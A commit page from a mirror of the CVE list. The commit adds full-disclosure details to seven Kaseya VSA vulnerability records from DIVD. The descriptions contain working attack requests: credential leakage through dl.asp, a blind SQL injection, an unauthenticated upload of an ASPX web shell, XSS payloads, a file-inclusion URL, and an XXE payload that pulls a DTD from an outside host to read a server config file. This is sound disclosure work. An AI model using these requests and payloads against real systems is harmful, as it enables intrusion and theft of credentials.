admin/cvelist
1
0
Fork 0
mirror of https://github.com/CVEProject/cvelist.git synced 2025-08-04 08:44:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Full disclosure Kaseya VSA

Browse Source
This commit is contained in:
Frank Breedijk 2022-03-02 20:25:43 +01:00
parent f9c02b2e28
commit b0755f65aa
7 changed files with 130 additions and 107 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
2021/30xxx/CVE-2021-30116.json
View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (on premise)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021."
"value": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021.\n\nBy default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. The default URL for this page is https://x.x.x.x/dl.asp\n\nWhen an attacker download a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini) which contains an Agent_Guid and AgentPassword\n\nThis Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9)\n\nThis request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.\n\nSecurity issues discovered\n---\n* Unauthenticated download page leaks credentials\n* Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents\n* dl.asp accepts credentials via a GET request\n* Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients.\n\nImpact\n---\nVia the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system. \n"
}
]
},
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-200 Information Exposure"
}
]
}

129
2021/30xxx/CVE-2021-30117.json
View File

@ -1,22 +1,9 @@
{
"data_type": "CVE",
"data_format": "MITRE",
"data_version": "4.0",
"generator": {
"engine": "Vulnogram 0.0.9"
},
"CVE_data_meta": {
"ID": "CVE-2021-30117",
"ASSIGNER": "cve@mitre.org",
"DATE_PUBLIC": "",
"TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6",
"AKA": "",
"STATE": "PUBLIC"
},
"source": {
"defect": [],
"advisory": "DIVD-2021-00011",
"discovery": "UNKNOWN"
"ID": "CVE-2021-30117",
"STATE": "PUBLIC",
"TITLE": "Authenticated SQL injection in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@ -25,84 +12,104 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (on premise and SaaS)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
},
{
"product_name": "Kaseya VSA Agent",
"version": {
"version_data": [
{
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.0.23"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.\n\nDetailed description\n---\n\nGiven the following request:\n```\nGET /InstallTab/exportFldr.asp?fldrId=1 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nWhere the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure.\n\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 19:12:11 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 881\n \n<!DOCTYPE html>\n<HTML>\n \n<HEAD>\n \t<title>Whoops.</title>\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" />\n \n \n\t<link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link>\n \n----SNIP----\n```\n\nHowever when fldrId is set to (SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END)) the request is allowed.\n\nRequest:\n```\nGET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1\nHost: 192.168.1.194\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\nCookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;\n```\n\nResponse:\n```\nHTTP/1.1 200 OK\nCache-Control: private\nContent-Type: text/html; Charset=Utf-8\nDate: Thu, 01 Apr 2021 17:33:53 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 7960\n \n \n<html>\n<head>\n<title>Export Folder</title>\n<style>\n------ SNIP ----- \n```"
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": {
"cvss": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-89 SQL Injection"
}
]
}
]
},
"description": {
"description_data": [
{
"lang": "eng",
"value": "SQL injection exists in Kaseya VSA before 9.5.6."
}
]
},
"references": {
"reference_data": [
{
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"refsource": "MISC",
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/",
"name": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
"url": "https://csirt.divd.nl/2021/07/07/Kaseya-Limited-Disclosure/"
},
{
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"refsource": "CONFIRM",
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021",
"name": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
"url": "https://helpdesk.kaseya.com/hc/en-gb/articles/360019966738-9-5-6-Feature-Release-8-May-2021"
}
]
},
"configuration": [],
"impact": {
"cvss": {
"version": "3.1",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "NONE",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"baseScore": 9.8,
"baseSeverity": "CRITICAL"
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "INTERNAL"
}
},
"exploit": [],
"work_around": [],
"solution": [],
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
}
]
}

16
2021/30xxx/CVE-2021-30118.json
View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA (On-premise and SaaS)",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA before 9.5.5 allows remote code execution."
"value": "An attacker can upload files with the privilege of the Web Server process for Kaseya VSA Unified Remote Monitoring & Management (RMM) 9.5.4.2149 and subsequently use these files to execute asp commands\n\nThe api /SystemTab/uploader.aspx is vulnerable to an unauthenticated arbitrary file upload leading to RCE. An attacker can upload files with the privilege of the Web Server process and subsequently use these files to execute asp commands.\n\nDetailed description\n---\nGiven the following request:\n```\nPOST /SystemTab/uploader.aspx?Filename=shellz.aspx&PathData=C%3A%5CKaseya%5CWebPages%5C&__RequestValidationToken=ac1906a5-d511-47e3-8500-47cc4b0ec219&qqfile=shellz.aspx HTTP/1.1\nHost: 192.168.1.194\nCookie: sessionId=92812726; %5F%5FRequestValidationToken=ac1906a5%2Dd511%2D47e3%2D8500%2D47cc4b0ec219\nContent-Length: 12\n\n<%@ Page Language=\"C#\" Debug=\"true\" validateRequest=\"false\" %>\n<%@ Import namespace=\"System.Web.UI.WebControls\" %>\n<%@ Import namespace=\"System.Diagnostics\" %>\n<%@ Import namespace=\"System.IO\" %>\n<%@ Import namespace=\"System\" %>\n<%@ Import namespace=\"System.Data\" %>\n<%@ Import namespace=\"System.Data.SqlClient\" %>\n<%@ Import namespace=\"System.Security.AccessControl\" %> \n<%@ Import namespace=\"System.Security.Principal\" %>\n<%@ Import namespace=\"System.Collections.Generic\" %> \n<%@ Import namespace=\"System.Collections\" %> \n \n<script runat=\"server\">\n \nprivate const string password = \"pass\"; // The password ( pass )\nprivate const string style = \"dark\"; // The style ( light / dark )\n \nprotected void Page_Load(object sender, EventArgs e)\n{\n\t//this.Remote(password);\n\tthis.Login(password);\n\tthis.Style(); \n\tthis.ServerInfo(); \n\t\n<snip>\n```\nThe attacker can control the name of the file written via the qqfile parameter and the location of the file written via the PathData parameter.\n\nEven though the call requires that a sessionId cookie is passed we have determined that the sessionId is not actually validated and any numeric value is accepted as valid.\n\nSecurity issues discovered\n---\n* a sessionId cookie is required by /SystemTab/uploader.aspx, but is not actually validated, allowing an attacker to bypass authentication\n* /SystemTab/uploader.aspx allows an attacker to create a file with arbitrary content in any place the webserver has write access\n* The web server process has write access to the webroot where the attacker can execute it by requesting the URL of the newly created file.\n\nImpact\n---\nThis arbitrary file upload allows an attacker to place files of his own choosing on any location on the hard drive of the server the webserver process has access to, including (but not limited to) the webroot. If the attacker uploads files with code to the webroot (e.g. aspx code) he can then execute this code in the context of the webserver to breach either the integrity, confidentiality, or availability of the system or to steal credentials of other users. In other words, this can lead to a full system compromise.\n"
}
]
},
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-434 Unrestricted Upload of File with Dangerous Type"
}
]
}

18
2021/30xxx/CVE-2021-30119.json
View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk and Hidde Smit"
"value": "Additional research by Frank Breedijk and Hidde Smit of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Cross Site Scripting (XSS) exists in Kaseya VSA before 9.5.7."
"value": "Authenticated reflective XSS in HelpDeskTab/rcResults.asp\n\nThe parameter result of /HelpDeskTab/rcResults.asp is insecurely returned in the requested web page and can be used to perform a Cross Site Scripting attack\n\nExample request:\n`https://x.x.x.x/HelpDeskTab/rcResults.asp?result=<script>alert(document.cookie)</script>`\n\nThe same is true for the parameter FileName of /done.asp\n\nEaxmple request:\n`https://x.x.x.x/done.asp?FileName=\";</script><script>alert(1);a=\"&PathData=&originalName=shell.aspx&FileSize=4388&TimeElapsed=00:00:00.078`\n\n\n"
}
]
},
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-79 Cross-site Scripting (XSS)"
}
]
}
@ -101,6 +103,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}

16
2021/30xxx/CVE-2021-30120.json
View File

@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<=",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,7 +33,7 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
}
],
"data_format": "MITRE",
@ -41,7 +43,7 @@
"description_data": [
{
"lang": "eng",
"value": "Kaseya VSA through 9.5.7 allows attackers to bypass the 2FA requirement."
"value": "Kaseya VSA before 9.5.7 allows attackers to bypass the 2FA requirement.\n\nThe need to use 2FA for authentication in enforce client-side instead of server-side and can be bypassed using a local proxy. Thus rendering 2FA useless.\n\nDetailed description\n---\nDuring the login process, after the user authenticates with username and password, the server sends a response to the client with the booleans MFARequired and MFAEnroled. If the attacker has obtained a password of a user and used an intercepting proxy (e.g. Burp Suite) to change the value of MFARequered from True to False, there is no prompt for the second factor, but the user is still logged in.\n\n\n"
}
]
},
@ -70,7 +72,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-305 Authentication Bypass by Primary Weakness"
}
]
}
@ -97,6 +99,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}

18
2021/30xxx/CVE-2021-30121.json
View File

@ -3,7 +3,7 @@
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30121",
"STATE": "PUBLIC",
"TITLE": "Authenticated local file inclusion in Kaseya VSA < v9.5.6"
"TITLE": "(Semi-)Authenticated local file inclusion in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,11 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk"
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -45,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "Authenticated local file inclusion in Kaseya VSA < v9.5.6"
"value": "Semi-authenticated local file inclusion\n\nThe contents of arbitrary files can be returned by the webserver\n\nExample request:\n`https://x.x.x.x/KLC/js/Kaseya.SB.JS/js.aspx?path=C:\\Kaseya\\WebPages\\dl.asp`\n\nA valid sessionId is required but can be easily obtained via CVE-2021-30118\n"
}
]
},
@ -74,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-829 Inclusion of Functionality from Untrusted Control Sphere"
}
]
}

22
2021/30xxx/CVE-2021-30201.json
View File

@ -3,7 +3,7 @@
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2021-30201",
"STATE": "PUBLIC",
"TITLE": "Authenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6"
"TITLE": "Unauthenticated XML External Entity vulnerability in Kaseya VSA < v9.5.6"
},
"affects": {
"vendor": {
@ -12,18 +12,20 @@
"product": {
"product_data": [
{
"product_name": "n/a",
"product_name": "Kaseya VSA",
"version": {
"version_data": [
{
"version_value": "n/a"
"version_affected": "<",
"version_name": "9.x",
"version_value": "9.5.6"
}
]
}
}
]
},
"vendor_name": "n/a"
"vendor_name": "Kaseya"
}
]
}
@ -31,7 +33,11 @@
"credit": [
{
"lang": "eng",
"value": "Discovered by Wietse Boonstra"
"value": "Discovered by Wietse Boonstra of DIVD"
},
{
"lang": "eng",
"value": "Additional research by Frank Breedijk of DIVD"
}
],
"data_format": "MITRE",
@ -41,7 +47,7 @@
"description_data": [
{
"lang": "eng",
"value": "An XML External Entity (XXE) issue exists in Kaseya VSA before 9.5.6."
"value": "The API /vsaWS/KaseyaWS.asmx can be used to submit XML to the system. When this XML is processed (external) entities are insecurely processed and fetched by the system and returned to the attacker.\n\nDetailed description\n\nGiven the following request:\n```\nPOST /vsaWS/KaseyaWS.asmx HTTP/1.1\nContent-Type: text/xml;charset=UTF-8\nHost: 192.168.1.194:18081\nContent-Length: 406\n \n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:kas=\"KaseyaWS\">\n <soapenv:Header/>\n <soapenv:Body>\n <kas:PrimitiveResetPassword>\n <!--type: string-->\n <kas:XmlRequest><![CDATA[<!DOCTYPE data SYSTEM \"http://192.168.1.170:8080/oob.dtd\"><data>&send;</data>]]>\n</kas:XmlRequest>\n </kas:PrimitiveResetPassword>\n </soapenv:Body>\n</soapenv:Envelope>\n```\n \nAnd the following XML file hosted at http://192.168.1.170/oob.dtd:\n```\n<!ENTITY % file SYSTEM \"file://c:\\\\kaseya\\\\kserver\\\\kserver.ini\">\n<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>\">\n%eval;\n%error;\n```\n\nThe server will fetch this XML file and process it, it will read the file c:\\\\kaseya\\\\kserver\\\\kserver.ini and returns the content in the server response like below.\nResponse:\n```\nHTTP/1.1 500 Internal Server Error\nCache-Control: private\nContent-Type: text/xml; charset=utf-8\nDate: Fri, 02 Apr 2021 10:07:38 GMT\nStrict-Transport-Security: max-age=63072000; includeSubDomains\nConnection: close\nContent-Length: 2677\n \n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>Server was unable to process request. ---&gt; There is an error in XML document (24, -1000).\\r\\n\\r\\nSystem.Xml.XmlException: Fragment identifier '########################################################################\n# This is the configuration file for the KServer.\n# Place it in the same directory as the KServer executable\n# A blank line or new valid section header [] terminates each section.\n# Comment lines start with ; or #\n########################################################################\n<snip>\n```\n\nSecurity issues discovered\n---\n* The API insecurely resolves external XML entities\n* The API has an overly verbose error response\n\nImpact\n---\nUsing this vulnerability an attacker can read any file on the server the webserver process can read. Additionally, it can be used to perform HTTP(s) requests into the local network and thus use the Kaseya system to pivot into the local network.\n\n"
}
]
},
@ -70,7 +76,7 @@
"description": [
{
"lang": "eng",
"value": "n/a"
"value": "CWE-611 Improper Restriction of XML External Entity Reference ('XXE')"
}
]
}
@ -102,6 +108,6 @@
},
"source": {
"advisory": "DIVD-2021-00011",
"discovery": "EXTERNAL"
"discovery": "INTERNAL"
}
}